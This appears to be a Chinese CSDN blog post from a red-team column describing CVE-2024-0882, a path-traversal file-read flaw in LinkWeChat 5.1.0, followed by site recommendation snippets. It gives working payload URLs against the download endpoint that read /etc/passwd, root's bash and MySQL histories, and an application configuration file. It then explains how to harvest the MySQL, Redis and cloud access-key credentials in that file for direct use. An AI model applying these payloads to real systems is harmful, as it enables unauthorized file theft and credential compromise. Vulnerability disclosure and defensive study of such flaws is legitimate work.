LinkWeChat任意文件读取(CVE-2024-0882)

已于 2024-04-14 23:23:59 修改
阅读量880 收藏 8
点赞数 5
分类专栏: 红蓝对抗 Web渗透测试 文章标签: 安全 web安全
于 2024-03-28 13:00:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39997829/article/details/137108148
版权

0x01  前言

    LinkWeChat 是基于企业微信的开源 SCRM 系统,是企业私域流量管理与营销的综合解决方案。不仅集成了企微强大的后台管理及基础的客户管理功能,而且提供了多种渠道、多个方式连接微信客户。主要运用于电商、零售、教育、金融、政务等服务行业领域化。

    该系统存在任意文件读取漏洞,使用输入 /profile/../../../../../etc/passwd 操作参数名称会导致路径遍历,可以远程发起攻击.

0x02  影响版本

LinkWechat 5.1.0

0x03  漏洞POC

  /profile/../../../../../etc/passwd

  /profile/../../../../../root/.bash_history

  /profile/../../../../../root/.mysql_history

xxxx.com/common/download/resource?name=/profile/../../../../../root/.bash_history
xxxx.com/common/download/resource?name=/profile/../../../../../etc/passswd

0x03  漏洞利用过程

        一般情况下,通过任意文件读取的漏洞获取到系统敏感配置文件和账密。比如我使用  /profile/../../../../../root/.bash_history 去读取历史命名文件,然后本地审计一下该文件,获取到管理员操作的命令,一般命令都会暴露应用的配置目录,比如如下所示:

cd /root/
ll
vi tomcat/webapps/xxxxx/WEB-INF/classes/application.yml 
ll
df -h

通过该命令我们就可以直接通过任意文件读取直接拿到该yml文件。

xxxxx/common/download/resource?name=/profile/../../../../..//root/tomcat/tomcat/webapps/xxxx/WEB-INF/classes/application.yml 
当然其他文件也可以通过这种方式获取到。

后面对其yml文件进行研究,发现文件当中配置了大量的账户密码,包括mysql、redis、ak/sk等等,可以直接进行利用。

LinkWeChat-其他
06-12
LinkWeChat,是一款基于企业微信的开源 SCRM 系统,为企业构建私域流量系统的综合解决方案,能显著提升企业社交运营效率。 应用场景 泛零售、电商行业企业微信用户,提供多种工具、多渠道、多方式添加客户到企业微信好友,通过营销互动与客户标签管理等建立强连接。 环境部署: 准备工作 JDK >= 1.8 (推荐1.8版本) Mysql >= 5.5.0 (推荐5.7版本) Redis >= 3.0 Maven >= 3.0 Node >= 10 核心技术: 前端技术栈 ES6、vue、vuex、vue-router、vue-cli、axios、element-ui 后端技术栈 SpringBoot、MyBatis-plus、Spring Security、Jwt
exp:CVE-2024-2961将phpfilter任意文件读取提升为远程代码执行(RCE)
10-30
CVE-2024-2961这个案例中,存在一个漏洞可以被用来进行任意文件读取。这表示攻击者能够读取服务器上任何文件的内容。从安全性的角度看,这已经相当危险,因为它可能泄露敏感配置文件、源代码或者其他重要数据。 ...
开源项目LinkWeChat深度指南:入门与问题解决
gitblog_01208的博客
10-18 1209
开源项目LinkWeChat深度指南:入门与问题解决 LinkWechat LinkWeChat后端代码仓库,-- 基于企业微信的开源 SCRM 系统,是企业私域流量管理与营销的综合解决方案。 项目地址: https://gitc...
LinkWeChat,唯一以开源为核心的SCRM
欢迎来到瑆箫博客,专为程序员和编程爱好者打造的技术博客。我们分享编程语言趋势、开发工具、编程哲学、职业发展等,助你掌握新技术,优化技能,激发编程热情。
12-03 1344
LinkWeChat是国内首个基于企业微信的开源SCRM,在集成了企微强大的开放能力的基础上,进一步升级拓展灵活高效的客户运营能力及多元化精准营销能力,让客户与企业之间建立强链接,帮助企业提高客户运营效率,强化营销能力,拓展盈利空间,是企业私域流量管理与营销的综合解决方案,目前已经受到企业微信的官方推荐和国家级木兰开源社区进行孵化,同时也是国家工信部重点扶持项目。企业微信最强大的能力在于其可以无缝连接微信,“通过微信与企业微信之间的连接,承载企业内外的关系与沟通,为企业提供内外沟通与管理的解决方案。
CVE-2024-0882 Scrm LinkWeChat 任意文件读取漏洞分析与研究
shelter1234567的博客
01-30 1884
本次测试是LinkWechat-Scrm-5.1.0版本,漏洞作者验证这个版本漏洞存在。运行,如果不出意外,1.txt已经被写入win.ini的内容,与实际访问不同的是,服务器是以流的形式返回给用户。
【项目简介】LinkWeChat:基于企业微信开源系统
sxjiangdongqin的专栏
10-30 1776
LinkWeChat:让每个企业都是私域管理专家 缘起 在企业数字化转型的时代,企业在线上客户营销方面有着三大痛点: 获客难:流量贵、中心流量平台多、客户流量过于分散、再次触达费用高 管理难:分散的客户流量无法进行统一管理,管理人员精力有限,导致客户运营成本极高 成交难:留存难、促活难,用户活跃度差、复购率低,客户容易流失,缺乏有效的营销工具 而私域流量概念的兴起,不仅解决了上述痛点,还让企业避免被流量平台的规则制约,所以布局私域流量已经成为了企业在激烈的市场竞争中占据一席之地的重要环节。但同时市
LinkWeChat:基于企业微信的开源SCRM系统探索
gitblog_01221的博客
10-18 647
LinkWeChat:基于企业微信的开源SCRM系统探索 LinkWechat LinkWeChat后端代码仓库,-- 基于企业微信的开源 SCRM 系统,是企业私域流量管理与营销的综合解决方案。 项目地址: https://gi...
**LinkWeChat 技术文档**
gitblog_01207的博客
10-18 1330
LinkWeChat 技术文档 LinkWechat LinkWeChat后端代码仓库,-- 基于企业微信的开源 SCRM 系统,是企业私域流量管理与营销的综合解决方案。 项目地址: https://gitcode.com/gh_...
CVE-2024-53677
最新发布
12-17
已在流行的 Apache Struts 框架中发现了一个严重漏洞 CVE-2024-53677,该漏洞可能允许攻击者远程执行任意代码。该漏洞是由文件上传逻辑中的缺陷引起的,可以利用这些缺陷进行路径遍历和恶意文件上传。 该漏洞会影响 ...
CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞复现
12-16
在某些情况下,如果应用程序没有正确地限制用户输入或者验证路径,攻击者就可能通过这种方式读取敏感文件,比如配置文件、日志文件,甚至执行服务器上的任意文件。 路径遍历漏洞不仅限于访问文件,还可能被用于...
LinkWeChat 开源 SCRM 系统 v1.0
12-15
为您提供LinkWeChat 开源 SCRM 系统下载,LinkWeChat,是一款基于企业微信的开源 SCRM 系统,为企业构建私域流量系统的综合解决方案,能显著提升企业社交运营效率。应用场景泛零售、电商行业企业微信用户,提供多种工具、多渠道、多方式添加客户到企业微信好友,通过营销互动与客户标签管理等建立强连接。环境部署:准备工作JDK >= 1.8 (推荐1.8版本)Mysql >= 5.5.0 (推荐5.7版本)Redis >= 3.0Maven
LinkWeChat开源系统 v5.1.3.zip
03-25
LinkWeChat开源系统 v5.1.3.zip
基于企业微信的LinkWeChat开源SCRM系统设计源码
04-17
本项目是基于企业微信开发的LinkWeChat开源SCRM系统设计源码,主要使用Java进行开发。项目共包含2394个文件,其中Java源代码文件2121个,XML配置文件220个,PNG图片文件17个,文本文件8个,Properties配置文件7个,Markdown文档文件5个,YAML配置文件4个,ZIP打包文件3个,Git忽略配置文件1个,以及项目许可证文件1个。该系统是一个企业私域流量管理与营销的综合解决方案,前端采用Vue3架构,后端采用主流的Java微服务架构,旨在帮助企业提高客户运营效率,强化营销能力,拓展盈利空间。项目结构清晰,代码注释详尽,适合用于学习和研究企业微信在SCRM系统开发中的应用。
基于企业微信的开源 SCRM 系统,采用主流的 Java 微服务架构
04-17
LinkWeChat 是基于企业微信的开源 SCRM 系统,采用主流的 Java 微服务架构,是企业私域流量管理与营销的综合解决方案,助力企业提高客户运营效率,强化营销能力,拓展盈利空间。
CVE-2024-38077漏洞检测工具
08-15
检测某个ip地址是否存在CVE-2024-38077漏洞,Windows 远程桌面授权服务远程代码执行漏洞。 使用方法:test.exe 192.168.1.2,扫描IP地址为192.168.1.2机器是否存在漏洞
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
私域管理平台,LinkWechat V4.5.0 版本发布
crg18438610577的博客
04-16 246
私域管理平台,LinkWechat V4.5.0 版本发布
探索LinkWeChat:企业微信私域流量的利器
gitblog_00075的博客
06-11 589
探索LinkWeChat:企业微信私域流量的利器 LinkWechat-ScrmLinkWeChat后端代码仓库,-- 基于企业微信的开源 SCRM 系统,是企业私域流量管理与营销的综合解决方案。项目地址:https://gitcode.com/gh_mirrors/li/LinkWechat-Scrm LinkWeChat是一个专为私域流量管理和营销打造的开源SCRM(Social Cust...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值